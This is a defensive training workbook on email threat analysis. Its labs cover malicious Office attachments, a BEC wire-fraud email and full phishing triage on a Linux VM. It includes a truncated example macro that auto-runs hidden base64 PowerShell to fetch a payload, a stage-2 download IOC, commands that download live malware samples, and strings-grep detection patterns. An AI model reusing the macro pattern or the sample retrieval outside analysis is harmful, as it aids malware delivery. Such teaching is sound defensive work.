Email Threat Analysis

📑 Table of Contents

Linux VM Setup & Tool Installation
Overview & Learning Objectives
Lab 4 — Email Attachment Analysis
Lab 5 — BEC (Business Email Compromise)
Lab 6 — Full Triage Workflow
Resources, Practice Samples & Quick-Reference
Instructor Notes

Setup

Linux VM Setup & Tool Installation

This workbook is written entirely for a Linux VM. Every command runs in a standard terminal — no Windows required. If you are using Kali Linux or REMnux, most tools below are already installed; skip to the Verify step.

🐧

Before you start: Create a VM snapshot in VirtualBox or VMware before downloading any samples. That gives you a clean restore point if anything goes wrong. Allocate at least 4 GB RAM and 40 GB disk to your VM.

Recommended Distributions

Distro	Why It Works Well	Best For
REMnux ⭐	Purpose-built malware analysis distro — ExifTool, oletools, Cuckoo support all pre-installed	Anyone who wants zero setup time
Kali Linux ⭐	ExifTool, oletools, pdf-parser already included in most installs	Students already familiar with Kali
Ubuntu 22.04 LTS	Stable, widely documented, easy apt installs	Beginners to Linux
Debian 12	Lightweight, stable, low resource use	Older hardware / small VMs

One-Time Tool Installation

Run this entire block once after creating your VM. It installs every tool used across all three labs.

# ── Step 1: Update package lists ──────────────────────────────────
sudo apt update && sudo apt upgrade -y

# ── Step 2: ExifTool (metadata extraction) ────────────────────────
sudo apt install -y libimage-exiftool-perl

# ── Step 3: Python 3 and pip (usually pre-installed) ─────────────
sudo apt install -y python3 python3-pip

# ── Step 4: oletools suite (macro analysis) ───────────────────────
pip3 install oletools --break-system-packages

# ── Step 5: PDF analysis tools ────────────────────────────────────
sudo apt install -y pdfid
pip3 install pdfminer.six --break-system-packages

# ── Step 6: File inspection utilities ────────────────────────────
sudo apt install -y file xxd binutils curl wget unzip git

# ── Step 7: python-docx (to create safe test .docx files) ────────
pip3 install python-docx --break-system-packages

# ── Step 8: whois for domain lookups ─────────────────────────────
sudo apt install -y whois

# ── Step 9: Optional — Thunderbird to open .eml files visually ───
sudo apt install -y thunderbird

# ── Verify everything installed correctly ─────────────────────────
echo "--- ExifTool ---" && exiftool -ver
echo "--- olevba ---"   && olevba --version
echo "--- Python 3 ---" && python3 --version
echo "--- All done! ---"

⚠️

If olevba is not found after pip install, your PATH may be missing ~/.local/bin. Fix it with:
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc && source ~/.bashrc

Verify Tool Paths

which exiftool       # → /usr/bin/exiftool
which olevba         # → /usr/local/bin/olevba  or  ~/.local/bin/olevba
which oledump.py     # → part of oletools package
which pdf-parser     # → /usr/bin/pdf-parser (Kali) or use pdf-parser.py
python3 --version    # → Python 3.10 or higher

Create Your Working Directory

# Create an isolated folder structure for all lab work
mkdir -p ~/email-threat-labs/{lab4,lab5,lab6,samples}
cd ~/email-threat-labs
ls -la   # should show lab4  lab5  lab6  samples

# Always copy sample files INTO this directory before analysing them
# Never analyse files from ~/Downloads or the Desktop

✅

Once setup is complete, take a fresh VM snapshot labelled "tools-installed-clean". Restore to this snapshot between labs to keep your environment consistent.

Overview & Learning Objectives

Complete these three labs in order. Each builds on skills from the previous one. By the end, you will be able to triage a complete phishing email from first receipt through to a structured incident report — using only a Linux terminal and free web tools.

Lab 4 — Attachment Analysis

Extract metadata, detect macros, sandbox detonation, IOC identification.

⏱ ~60 min

Lab 5 — BEC Scenario

Header forensics, display-name spoofing, wire transfer fraud verification.

⏱ ~45 min

Lab 6 — Full Triage Workflow

End-to-end structured incident report: sender, links, attachment, affected users, actions.

⏱ ~90 min

Tools Used Across All Labs

Tool	Purpose	How to Install on Linux
ExifTool	File metadata extraction	`sudo apt install libimage-exiftool-perl`
olevba / oletools	Office macro analysis	`pip3 install oletools --break-system-packages`
oledump.py	Low-level OLE stream inspection	Included with oletools
pdf-parser	PDF JavaScript / object inspection	`sudo apt install pdfid` (Kali pre-installed)
file	Detect true file type regardless of extension	Pre-installed on all Linux distros
sha256sum / md5sum	Generate hashes for VirusTotal lookup	Pre-installed on all Linux distros
strings	Extract readable text from any binary	`sudo apt install binutils`
whois	Domain registration lookup	`sudo apt install whois`
curl / wget	Download samples, query APIs from terminal	`sudo apt install curl wget`
VirusTotal	File & URL reputation	Web — virustotal.com
Any.run	Cloud sandbox (Windows environment)	Web — any.run
MXToolbox	Email header analysis	Web — mxtoolbox.com/EmailHeaders
URLScan.io	Safe URL inspection	Web — urlscan.io
AbuseIPDB	IP reputation check (free API)	Web + curl API — abuseipdb.com

🚨

Golden Safety Rule: All work happens inside your Linux VM. Never copy sample files to your host machine. Never open a suspicious file in any application on the VM — all analysis is terminal-only unless you are using a cloud sandbox.

Lab 4

Email Attachment Analysis

A user forwards an email with a suspicious Word document. Your job is to examine the file without executing it — extract metadata, detect hidden macros, then detonate it safely in a cloud sandbox to observe its behaviour.

🚨

Safety: Do NOT open any sample file in LibreOffice or any application on your VM — macros can execute even on Linux if enabled. All analysis is terminal-only in this lab.

Where to Get Sample Files for Lab 4

You need a .docx or .doc file with an embedded VBA macro. Choose one of the options below.

📦 Option A — MalwareBazaar API (Recommended · No Account Needed)

MalwareBazaar hosts thousands of confirmed malicious Office documents tagged by family. All samples are zipped with password infected. This is the fastest way to get a real macro-laden file.

# Navigate to your lab4 directory
cd ~/email-threat-labs/lab4

# Search for VBA macro samples and get the first result's SHA256
curl -s -X POST https://mb-api.abuse.ch/api/v1/ \
  -d 'query=get_taginfo&tag=VBA&limit=5' | python3 -m json.tool | grep sha256_hash

# Download a specific sample by its SHA256 hash (replace HASH below)
curl -s -X POST https://mb-api.abuse.ch/api/v1/ \
  -d 'query=get_file&sha256_hash=PASTE_SHA256_HERE' \
  --output macro_sample.zip

# Unzip — password is always: infected
unzip -P infected macro_sample.zip

# List what was extracted
ls -lh

Website alternative: Go to bazaar.abuse.ch in your VM browser → search tag VBA, Emotet, or AgentTesla → click any result → Download (password: infected).

📦 Option B — Create a Safe Synthetic Test File (Safest for Beginners)

This creates a harmless .docx with realistic metadata that you can use to practise every ExifTool and olevba command — zero risk, no internet download needed.

# Make sure python-docx is installed
pip3 install python-docx --break-system-packages

# Run this Python snippet to generate the test file
python3 - <<'PYEOF'
from docx import Document
doc = Document()
doc.core_properties.author        = "Mikhail K"
doc.core_properties.last_modified_by = "admin"
doc.core_properties.company       = "UNKNOWN"
doc.add_heading("Invoice #2024-0312", level=1)
doc.add_paragraph("Please find your outstanding payment details below.")
doc.add_paragraph("Amount due: $12,500.00 — wire to account 8821-004-91")
path = "/root/email-threat-labs/lab4/suspicious_invoice.docx"
doc.save(path)
print(f"Test file created → {path}")
PYEOF

Once created, use this file for all Part A and B commands. It has suspicious metadata but no executable macro.

📦 Option C — LetsDefend Challenge Files (Guided + Scored)

LetsDefend provides real phishing email samples as part of its free SOC simulator. Each challenge gives you a downloadable .eml or attachment that may include a malicious .docx.

Steps:

Create a free account at letsdefend.io
Go to Learning Paths → Email Analysis
Each challenge provides a downloadable sample — save to ~/email-threat-labs/lab4/
Your answers are scored automatically — great for self-assessment

📦 Option D — theZoo GitHub Repository (Advanced · Live Malware)

A curated repository of real malware samples for educational use. Take a VM snapshot before cloning.

# Clone into your samples directory
cd ~/email-threat-labs/samples
git clone https://github.com/ytisf/theZoo.git

# Browse available Office macro samples
ls theZoo/malware/Binaries/ | grep -i office

# Copy a sample to your lab4 working directory for analysis
cp theZoo/malware/Binaries/SomeFamily/SomeFamily.zip \
   ~/email-threat-labs/lab4/
unzip -P infected ~/email-threat-labs/lab4/SomeFamily.zip \
  -d ~/email-threat-labs/lab4/

🚨

These are live, functioning malware samples. Never extract outside a VM. Never transfer to your host machine.

Part A — Metadata Extraction

💡

What is metadata? Files embed hidden information — who created them, on what software, at what time, and for which organisation. This "data about data" often exposes the real attacker even when the email body looks convincing.

Step-by-Step Commands (Linux Terminal)

Navigate to your lab directory:
```
cd ~/email-threat-labs/lab4
```

Always confirm the true file type first — never trust the extension:

file suspicious_invoice.docx
# Expected: Microsoft Word 2007+ (ZIP)
# If it says something different, the extension may be faked

Generate file hashes for VirusTotal lookup:

sha256sum suspicious_invoice.docx
md5sum    suspicious_invoice.docx

Run ExifTool to extract all metadata:
```
exiftool suspicious_invoice.docx
```

Extract only the most forensically interesting fields:

exiftool -Author -LastModifiedBy -Company \
         -CreateDate -ModifyDate -Software \
         suspicious_invoice.docx

For PDF attachments instead of .docx:

exiftool -Producer -Creator -Author -CreateDate report.pdf

Linux bonus — inspect the raw ZIP structure (a .docx is a ZIP archive):

# List all files inside the docx without extracting
unzip -l suspicious_invoice.docx

# Extract and read the core metadata XML directly
mkdir /tmp/docx_inspect
unzip suspicious_invoice.docx -d /tmp/docx_inspect
cat /tmp/docx_inspect/docProps/core.xml

# Hunt for embedded URLs or IPs across all XML files
grep -rEo '(https?://[^ "<>]+|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})' \
  /tmp/docx_inspect/

# Clean up
rm -rf /tmp/docx_inspect

Cross-reference the Author field against the claimed sender in the email.

Sample ExifTool Output — Annotated

File Name        : Invoice_March2024.docx
Author           : Mikhail K           ← Does NOT match "FedEx Billing"
Last Modified By : admin               ← Generic admin account
Company          : UNKNOWN             ← Legitimate docs embed a company name
Create Date      : 2024:02:14 03:21:07 ← 3 AM creation — outside business hours
Modify Date      : 2024:03:01 09:44:22
Template         : Normal.dotm
Software         : Microsoft Word 16.0 (Windows)

🚩

Red Flags in this output:

Author 'Mikhail K' — does not match claimed sender 'FedEx Billing'
Creation time 03:21 AM — outside normal business hours
Company is UNKNOWN — legitimate corporate documents almost always embed a company name
Note: ExifTool on Linux reads all metadata just as well as on Windows — the metadata is inside the file, not the OS

Analysis Checklist — Record Your Findings

Does the Author field match the claimed sender name?
Is the creation timestamp unusual — odd hours, weekends, future-dated?
Is the Company field blank, "UNKNOWN", or a foreign organisation?
Does the Software version match what the sending org is known to use?
Does the file command confirm the extension matches the true file type?
Did the raw XML inspection reveal any embedded URLs or IPs?
Did VirusTotal return any detections for this file hash?

Part B — Macro & Embedded Script Detection

💡

What are macros? Office documents can contain VBA (Visual Basic for Applications) scripts that run automatically when the file is opened. Attackers embed them to download malware, run PowerShell, or establish persistence. On Linux, olevba lets you read the macro source safely — no execution risk.

Step-by-Step Commands

Confirm oletools is installed and working:
```
olevba --version
```

Run the initial macro scan:

cd ~/email-threat-labs/lab4
olevba suspicious_invoice.docx

Review the flags olevba assigns — look for: AutoExec, Suspicious, IOC
Dump and decode the full macro source code:
```
olevba --reveal suspicious_invoice.docx
```

Use oledump.py for a low-level OLE stream inspection:

oledump.py suspicious_invoice.docx

# If a stream is flagged with 'M' (macro), dump it with:
oledump.py -s A3 -v suspicious_invoice.docx
# Replace A3 with whichever stream number shows 'M'

For PDF attachments — scan for embedded JavaScript:

pdf-parser -s JavaScript suspicious.pdf
# On some systems the command is:
pdf-parser.py -s JavaScript suspicious.pdf

Use strings as a quick check for readable URLs and commands hidden in the binary:

strings suspicious_invoice.docx \
  | grep -iE '(http|powershell|cmd\.exe|base64|shell|wscript)'

Sample olevba Output — Annotated

Type	Keyword	What It Means
AutoExec	AutoOpen	Code runs the moment the document is opened — no user click required
Suspicious	Shell	Macro may launch an external application
Suspicious	PowerShell	Macro may invoke PowerShell (Windows command runner)
Suspicious	Base64 Strings	Obfuscated payload — deliberately encoded to evade antivirus
IOC	185.220.101.47	C2 IP address embedded in the macro
IOC	http://185.220.101.47/stage2.exe	Second-stage payload download URL

Decoded Macro Source (Example)

Sub AutoOpen()
  Dim cmd As String
  cmd = "powershell -nop -w hidden -enc " & _
        "aQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA..."
  Shell cmd
End Sub

🚨

What this macro does:

AutoOpen — fires immediately on file open, no prompts to the user
Base64-encoded PowerShell — the long string is an obfuscated command that evades AV
-w hidden — hides the terminal window from the victim (Windows flag)
Shell call — executes a system command, used here to download and run a remote payload

🐧

Linux note: The macro contains Windows-only commands (PowerShell, Shell). Running this in LibreOffice on Linux would not trigger the payload since these commands don't exist — but never open it anyway. Some macro families detect the OS and carry Linux-specific payloads.

IOC Checklist — Tick Everything You Find

AutoOpen / AutoClose / Document_Open / Workbook_Open triggers
Shell, WScript.Shell, CreateObject calls
PowerShell execution strings
Base64 or XOR-encoded payloads
Hardcoded IP addresses or domains
File system write paths (Temp, AppData, ProgramData)
Registry modification calls (RegWrite, Run keys)
Scheduled task creation

Part C — Sandbox Detonation & Report Reading

💡

What is sandbox detonation? You upload the file to an online service that runs it inside an isolated Windows VM in the cloud and records every action — processes spawned, network connections made, files written, registry changes — with zero risk to your Linux VM.

Submit to Any.run (Cloud Sandbox)

Create a free account at any.run in your VM browser
Click New Task → Upload File → select your sample from ~/email-threat-labs/lab4/
Environment: Windows 10 x64 — Enable Fake Internet and Monitor All Processes
Click Run and watch the live interactive session
Review all report tabs: Process Tree · Network · File System · Verdict

What to Look For

🌲 Process Tree winword.exe spawning cmd.exe → powershell.exe is the classic malicious chain. Screenshot it for your report.

🌐 Network Activity C2 beaconing — HTTP POST to unknown IPs, DNS queries for random-looking domains.

📁 File Drops New .exe, .dll, or .bat files written to %TEMP%, AppData, or ProgramData.

🔒 Persistence Registry Run key writes, scheduled task creation, startup folder drops.

🐧

Local sandbox option (advanced): You can run Cuckoo Sandbox or its modern fork CAPEv2 locally on Linux to keep samples entirely offline. See github.com/kevoreilly/CAPEv2 for setup instructions — requires nested VM support in your hypervisor.

💡

Cross-reference tip: Take every IP and domain from the sandbox report and check it on AbuseIPDB, VirusTotal, and ThreatFox. These cross-references become your final IOC list for the report.

✅ Lab 4 Deliverable

Screenshot of ExifTool output with anomalies highlighted
olevba findings table with your interpretation of each flag
Sandbox report link or screenshot of the process tree
Final IOC list: SHA256 hash, IP address(es), domain(s), dropped file hashes
One-paragraph verdict: is this malicious, and what does it try to do?

Lab 5

BEC — Business Email Compromise

The finance department receives an urgent email appearing to come from the CFO requesting a $47,000 wire transfer. Your job is to determine whether it is legitimate — using header analysis, authentication checks, and company policy verification.

💡

What is BEC? Business Email Compromise is a social engineering attack where criminals impersonate executives to trick employees into transferring money or sensitive data. It relies on psychological manipulation, not malware — making it harder for technical controls to catch.

Where to Get Sample .eml Files for Lab 5

📦 Option A — Create a Realistic BEC .eml File (Recommended · Zero Risk)

This is the safest and fastest approach. The script below creates a complete, realistic BEC email file on your VM that replicates exactly the scenario in this lab.

# Create a realistic BEC .eml file for analysis practice
cat > ~/email-threat-labs/lab5/bec_wire_transfer.eml <<'EOF'
Received: from mail.acme-corp.net (185.220.101.12)
         by mx1.acme-corp.com with ESMTP; Fri, 14 Mar 2025 16:47:03 +0100
Return-Path: <j.whitfield@acme-corp.net>
Message-ID: <20250314154703.GA12847@vps-server.ru>
From: "James Whitfield" <j.whitfield@acme-corp.net>
Reply-To: j.whitfield.cfo@gmail.com
To: accounts.payable@acme-corp.com
Subject: URGENT -- Vendor Payment Required Today
X-Originating-IP: 185.220.101.12
Authentication-Results: mx1.acme-corp.com;
  dkim=fail (no signature) header.d=acme-corp.net;
  spf=fail (sender not permitted) smtp.mailfrom=acme-corp.net;
  dmarc=fail (p=reject) header.from=acme-corp.net
MIME-Version: 1.0
Content-Type: text/plain

Hi Sarah,

I'm in a board meeting all afternoon and need you to process an urgent
wire transfer before close of business today. Our new vendor requires
payment to initiate the Q2 contract.

Amount: $47,250.00
Bank: First National Bank, Account: 8834-221-09
Routing: 021000021

Please action this immediately and do not cc anyone else — this is
confidential until the contract is signed. I'll explain everything Monday.

James Whitfield
CFO, Acme Corporation
EOF

echo "✅ BEC sample created at ~/email-threat-labs/lab5/bec_wire_transfer.eml"

This file is entirely safe — it is plain text and contains no executable content.

📦 Option B — PhishTank (Community-Verified Real Phishing Data)

PhishTank provides a database of verified phishing URLs submitted by the community. Useful for Lab 5 link analysis and for building realistic scenarios.

# Download the full verified phishing URL database (JSON)
cd ~/email-threat-labs/lab5
wget http://data.phishtank.com/data/online-valid.json.gz
gunzip online-valid.json.gz

# Preview the first 5 entries
python3 -c "
import json
with open('online-valid.json') as f:
    data = json.load(f)
for entry in data[:5]:
    print(entry.get('url',''), '|', entry.get('verified',''))
"

Note: PhishTank provides URLs, not full .eml files. Use these URLs as the phishing link in your Lab 5 scenario.

📦 Option C — LetsDefend Email Analysis Challenges (Guided + Real .eml Files)

LetsDefend includes guided BEC and phishing scenarios with real downloadable .eml files and automatic answer scoring.

Create a free account at letsdefend.io
Go to Learning → SOC Analyst Path → Email Analysis
Download the provided .eml file from any BEC challenge
Save to ~/email-threat-labs/lab5/ and use the commands in Part B below

📦 Option D — Blue Team Labs Online (Free Graded Challenges)

BTLO has dedicated email forensics challenges that include .eml files containing spoofed BEC emails with real header data.

Website: blueteamlabs.online → Challenges → Email Analysis
Download the challenge file directly from your VM browser and save to ~/email-threat-labs/lab5/.

Part A — The Suspicious Email

From:James Whitfield <j.whitfield@acme-corp.net>

Reply-To:j.whitfield.cfo@gmail.com ← Hijacked reply address!

To:accounts.payable@acme-corp.com

Subject:URGENT — Vendor Payment Required Today

Date:Friday 14 Mar 2025, 16:47 PM

Hi Sarah, I'm in a board meeting all afternoon and need you to process an urgent wire transfer before close of business today. Our new vendor Apex Logistics Solutions requires payment to initiate the Q2 contract. Amount: $47,250.00 Bank: First National Bank, Account: 8834-221-09 Routing: 021000021 Please action this immediately and don't cc anyone else — this is confidential until the contract is signed. I'll explain everything on Monday. Thanks, James Whitfield CFO, Acme Corporation

Spot the Social Engineering — Tick Each Red Flag You See

Domain mismatch: acme-corp.NET vs legitimate acme-corp.COM
Reply-To hijack: replies go to a Gmail address the attacker controls
Urgency pressure: "today", "before close of business"
Secrecy instruction: "don't cc anyone" — isolates the victim from oversight
Unavailability excuse: "in a board meeting" — prevents a quick phone verification
Request to bypass normal payment approval workflow
Unknown vendor with no prior purchase order or contract reference
Late Friday afternoon — less management oversight, weekend delay built in

Part B — Header Analysis

💡

What are email headers? Every email carries invisible technical metadata — routing servers, authentication results, originating IPs, and reply-to addresses. These form the forensic fingerprint of an email. They cannot be faked without failing authentication checks.

Analyse Headers Using the Linux Terminal

cd ~/email-threat-labs/lab5

# ── 1. View the complete raw email ───────────────────────────────
cat bec_wire_transfer.eml

# ── 2. Show headers only (everything before the blank line) ──────
sed '/^$/q' bec_wire_transfer.eml

# ── 3. Pull out the key forensic fields ──────────────────────────
grep -i "^From:\|^Reply-To:\|^Return-Path:\|^X-Originating-IP:" \
  bec_wire_transfer.eml

# ── 4. Check SPF / DKIM / DMARC authentication results ───────────
grep -i "Authentication-Results" -A 6 bec_wire_transfer.eml

# ── 5. Extract all IP addresses from headers ─────────────────────
grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' \
  bec_wire_transfer.eml | sort -u

# ── 6. Check if the originating IP is a known Tor exit node ──────
curl -s "https://check.torproject.org/torbulkexitlist" | grep "185.220.101.12"
# If the IP appears in the output, it IS a Tor exit node

# ── 7. Check IP reputation via AbuseIPDB (free API key required) ─
curl -s "https://api.abuseipdb.com/api/v2/check?ipAddress=185.220.101.12" \
  -H "Key: YOUR_API_KEY" \
  -H "Accept: application/json" | python3 -m json.tool

# ── 8. Domain WHOIS — when was acme-corp.net registered? ─────────
whois acme-corp.net | grep -i "creation\|registered\|registrar"

The Headers — What the Evidence Shows

Received: from mail.acme-corp.net (185.220.101.12)
         by mx1.acme-corp.com with ESMTP; Fri, 14 Mar 2025 16:47:03 +0100
Return-Path: <j.whitfield@acme-corp.net>
Message-ID: <20250314154703.GA12847@vps-server.ru>  ← Russian VPS server
From: "James Whitfield" <j.whitfield@acme-corp.net>
Reply-To: j.whitfield.cfo@gmail.com                 ← Attacker's Gmail
X-Originating-IP: 185.220.101.12                    ← Tor exit node
Authentication-Results: mx1.acme-corp.com;
  dkim=fail (no signature) header.d=acme-corp.net;
  spf=fail (sender not permitted) smtp.mailfrom=acme-corp.net;
  dmarc=fail (p=reject) header.from=acme-corp.net

What Each Failure Means

❌ SPF Fail Server 185.220.101.12 is not in acme-corp.net's authorised sender list — the domain is being spoofed from an unauthorised server.

❌ DKIM Fail No valid cryptographic signature from acme-corp.net — the email was not sent by any system that holds the domain's private key.

❌ DMARC Fail Domain policy is p=reject — mail providers are supposed to block this automatically. It reached the inbox due to a misconfiguration.

❌ Reply-To Hijack Any reply from Sarah goes to the attacker's Gmail — the real CFO never sees her response.

SPF / DKIM / DMARC Quick Reference

Protocol	Result	Meaning	Verdict
SPF	`pass`	Sending server is authorised by the domain	✅ OK
SPF	`fail`	Sending server is NOT authorised	❌ FAIL
SPF	`softfail`	Suspicious but not conclusive	⚠️ WARN
DKIM	`pass`	Email is cryptographically signed by the domain	✅ OK
DKIM	`fail`	No valid signature / possibly tampered with in transit	❌ FAIL
DMARC	`pass`	Aligns with domain's published policy	✅ OK
DMARC	`fail`	Failed alignment — possible spoofing	❌ FAIL

Part C — Verification Workflow & Verdict

💡

What is out-of-band verification? Contacting the requester through a completely independent channel — phone, in person, video call — that the attacker cannot intercept or fake. Never use contact details from inside the suspicious email itself.

Verification Checklist — Do All of These Before Escalating

Call the CFO directly on the number from the company directory — not any number in the email
Walk to the CFO's office if they are physically in the building
Check your finance SOP — does it require dual approval for wire transfers over a threshold?
Verify whether 'Apex Logistics Solutions' appears in the approved vendor list
Check whether the bank account details match any previously approved payee
Escalate immediately to SOC / IT Security and your direct manager
Preserve the raw .eml file — do not delete or forward the original

🔴 Verdict: Confirmed BEC Attempt

Domain spoofing confirmed. SPF, DKIM, and DMARC all fail. Reply-To hijacked to attacker Gmail. Originating IP is a Tor exit node. Message-ID reveals a Russian VPS. Multiple social engineering techniques present: urgency, secrecy, executive impersonation, unavailability excuse.

Do NOT action the wire transfer. Preserve all evidence. Report to IT Security, Finance leadership, and the real CFO immediately.

✅ Lab 5 Deliverable

Terminal output showing SPF, DKIM, DMARC grep results from the .eml file
List of social engineering techniques identified in the email body
Summary of IP reputation findings (Tor exit node, AbuseIPDB score)
Documented out-of-band verification steps taken
Formal recommendation: block sender domain, notify CFO, file incident ticket, report to finance leadership

Lab 6

Full Triage Workflow

A complete phishing email has landed in the SOC queue. You have 90 minutes to produce a structured incident triage report covering all dimensions: sender analysis, link analysis, attachment forensics, affected users, and recommended response actions.

The Email to Triage

From:IT-Helpdesk <noreply@it-support-ticketing.com>

To:all-staff@yourcompany.com

Subject:Action Required: Your Microsoft 365 Account Will Be Suspended

Date:Mon 10 Mar 2025, 08:03 AM

Attach:AccountActivityLog_March2025.docx (68 KB)

Dear Employee, Our systems have detected unusual sign-in activity on your Microsoft 365 account. To prevent account suspension, you must verify your credentials within 24 hours. Click below to verify your account: https://microsoft365-secure-login.it-support-ticketing.com/verify?token=a7f3k Your account activity log is attached for your review. Regards, IT Helpdesk Support Team

🚨

Do NOT visit the URL above. Use URLScan.io from your VM browser to safely inspect the link. The domain is fictional but every technique described is real.

💡

Subdomain deception: The URL microsoft365-secure-login.it-support-ticketing.com looks like a Microsoft URL at a glance. But the actual registered domain is it-support-ticketing.com (attacker-owned). Everything before the last two dot-separated parts is just a subdomain — controlled entirely by the attacker.

Linux Triage Commands for Lab 6

Work through these commands in order. Each step feeds into the next section of your report.

cd ~/email-threat-labs/lab6

# ── Step 1: Hash the attachment immediately ───────────────────────
sha256sum AccountActivityLog_March2025.docx
md5sum    AccountActivityLog_March2025.docx

# ── Step 2: Check the true file type ─────────────────────────────
file AccountActivityLog_March2025.docx

# ── Step 3: Full metadata extraction ─────────────────────────────
exiftool AccountActivityLog_March2025.docx

# ── Step 4: Targeted metadata fields ─────────────────────────────
exiftool -Author -LastModifiedBy -Company \
         -CreateDate -ModifyDate -Software \
         AccountActivityLog_March2025.docx

# ── Step 5: Macro analysis ───────────────────────────────────────
olevba AccountActivityLog_March2025.docx
olevba --reveal AccountActivityLog_March2025.docx

# ── Step 6: OLE stream dump ──────────────────────────────────────
oledump.py AccountActivityLog_March2025.docx

# ── Step 7: String-hunt for URLs and commands ────────────────────
strings AccountActivityLog_March2025.docx \
  | grep -iE '(https?://|powershell|cmd|base64|wscript)'

# ── Step 8: Raw docx structure inspection ────────────────────────
unzip -l AccountActivityLog_March2025.docx

# ── Step 9: Domain WHOIS on the phishing domain ──────────────────
whois it-support-ticketing.com
# Note the creation date — recently registered domains are a red flag

# ── Step 10: IP reputation check on sender IP from email headers ──
curl -s "https://api.abuseipdb.com/api/v2/check?ipAddress=SENDER_IP" \
  -H "Key: YOUR_ABUSEIPDB_KEY" \
  -H "Accept: application/json" | python3 -m json.tool

# ── Step 11: Check URL against VirusTotal (use their web UI or API)
# Safely paste the URL into virustotal.com and urlscan.io — do NOT click it

Triage Report Template

Fill in each field as you work through your analysis. This becomes your final submitted incident report.

1. Incident Metadata

Analyst name, date and time of triage, ticket / case reference

Email subject and original recipient(s)

How was this email reported? (User, gateway alert, automated rule)

2. Sender Analysis

Display name vs actual From address — match or mismatch?

Domain WHOIS: registration date, registrar, owner country

SPF / DKIM / DMARC results from email headers

Originating IP reputation — AbuseIPDB score, VirusTotal detections

Does the domain impersonate a known brand or your internal IT team?

3. Link / URL Analysis

Full URL extracted from email source (do NOT click — copy from raw headers)

Actual registered domain vs subdomain deception explained

URLScan.io result: redirect chain and final destination

Final landing page category: credential harvester, malware download, or other

VirusTotal URL scan result and detection count

Domain age — flag if registered within the last 30 days

4. Attachment Analysis

File name, true type (from file command), size, SHA256 hash

ExifTool metadata findings: Author, Company, CreateDate anomalies

olevba macro indicators: AutoExec triggers, suspicious keywords, IOCs

oledump.py stream findings

Sandbox detonation verdict and key observed behaviours

Full IOC list: IPs, domains, dropped file hashes, registry keys

5. Affected Users & Scope

All recipients — check mail gateway delivery logs

Did anyone click the link? (Proxy / firewall / SIEM logs)

Did anyone open the attachment? (EDR telemetry)

Any credential submissions detected? (Identity provider anomalies)

Blast radius assessment: isolated user vs department-wide vs all-staff

6. Recommended Actions

Immediate: quarantine all copies of the email from inboxes

Block: sender domain, originating IP, phishing URL at gateway and firewall

Notify: affected users with clear instructions — do not click, do not open

Credential reset: force password change for anyone who clicked or submitted credentials

Threat intel: add all IOCs to SIEM, EDR, and firewall blocklists

Escalation: at what point does this become a P1 incident requiring exec notification?

Lessons learned: what email gateway rule would have caught this?

7. Verdict

Classification: Malicious / Suspicious / Benign — with confidence level

Attack type: credential phishing, malware delivery, BEC, or combo attack

Threat actor indicators: any attribution signals from IOCs or TTPs

Model Answers — Lab 6

📖

Complete your own analysis and fill in the report above before reading the model answers below.

Key findings students should identify:

From domain it-support-ticketing.com is not a Microsoft domain and not the company's own domain — it is attacker-registered.
Subdomain trick: microsoft365-secure-login is merely a subdomain of the attacker's domain, designed to fool a quick visual scan.
URLScan.io would show the final page is a Microsoft 365 login clone — a credential harvester that captures the victim's username and password.
The attachment almost certainly contains an AutoOpen macro downloading a second-stage payload — the email is a combo attack (credential phish + malware delivery).
Sent to all-staff — high blast radius. This is an organisation-wide incident, not an individual phish. Priority triage required immediately.
Verdict: Malicious — credential phishing combined with macro-based malware delivery. Classify as P1 if any users clicked or opened the attachment.
Linux commands that clinch it: whois would show a recently registered domain; olevba would show AutoOpen + Shell + base64 IOCs; exiftool would show a mismatched Author field.

Resources

Practice Sample Sources & Quick-Reference

🚨

Safety reminder: Download all malware samples directly into your isolated Linux VM. Use password-protected zips (password: infected) as provided. Take a VM snapshot before every download.

Free Sample Sources — by Lab

Source	Best For	What You Get	Linux Download
MalwareBazaar bazaar.abuse.ch	Lab 4	Thousands of real malicious Office docs with confirmed VBA macros. Free, no account.	`curl -X POST https://mb-api.abuse.ch/api/v1/ -d 'query=get_taginfo&tag=VBA'`
PhishTank phishtank.org	Labs 5, 6	Community-verified phishing URLs. Free API. Good for link analysis practice.	`wget http://data.phishtank.com/data/online-valid.json.gz`
OpenPhish openphish.com	Labs 5, 6	Real-time phishing feed. Plain text URL list, free tier.	`curl https://openphish.com/feed.txt`
URLhaus urlhaus.abuse.ch	Lab 6	Malicious URL database, great for link and domain analysis.	`wget https://urlhaus.abuse.ch/downloads/csv/`
LetsDefend letsdefend.io	All labs	Guided challenges with real .eml files. Automatically graded. Free tier.	VM browser — letsdefend.io
Blue Team Labs Online blueteamlabs.online	Labs 5, 6	Free email forensics challenges with downloadable .eml files and scoring.	VM browser — blueteamlabs.online
theZoo (GitHub) github.com/ytisf/theZoo	Lab 4 (advanced)	Live malware repository. VM snapshot required before use.	`git clone https://github.com/ytisf/theZoo.git`
CyberDefenders cyberdefenders.org	All labs	DFIR challenges including email forensics. Free and paid tiers.	VM browser — cyberdefenders.org
TryHackMe tryhackme.com	All labs	Phishing Emails 1–5 learning path. Beginner friendly, browser-based.	VM browser — tryhackme.com

Linux Command Quick-Reference Card

📋 File Inspection — Always Run These First

file suspicious.docx                          # True file type — never trust the extension
sha256sum suspicious.docx                     # SHA256 hash for VirusTotal lookup
md5sum    suspicious.docx                     # MD5 hash
strings   suspicious.docx | head -80          # Readable strings from the binary
unzip -l  suspicious.docx                     # List internal files (docx is a ZIP)

📋 Metadata Extraction

exiftool file.docx                            # All metadata
exiftool -Author -Company -CreateDate file.docx # Key forensic fields
exiftool -csv *.docx                          # Batch — all files, CSV output

# Read metadata XML directly from the docx ZIP
unzip file.docx docProps/core.xml -p          # Print core.xml to stdout

🔬 Macro Analysis

olevba file.docx                              # Detect macros + flag suspicious keywords
olevba --reveal file.docx                     # Dump decoded macro source code
oledump.py file.docx                          # Low-level OLE stream dump
oledump.py -s A3 -v file.docx                 # Dump stream A3 (macro-flagged stream)
pdf-parser -s JavaScript file.pdf             # Find JavaScript in a PDF

# Quick string hunt for common malware indicators
strings file.docx | grep -iE '(http|powershell|cmd\.exe|base64|shell|wscript|regwrite)'

📧 Header Analysis from the Terminal

cat email.eml                                 # Full raw email
sed '/^$/q' email.eml                         # Headers only (stop at first blank line)
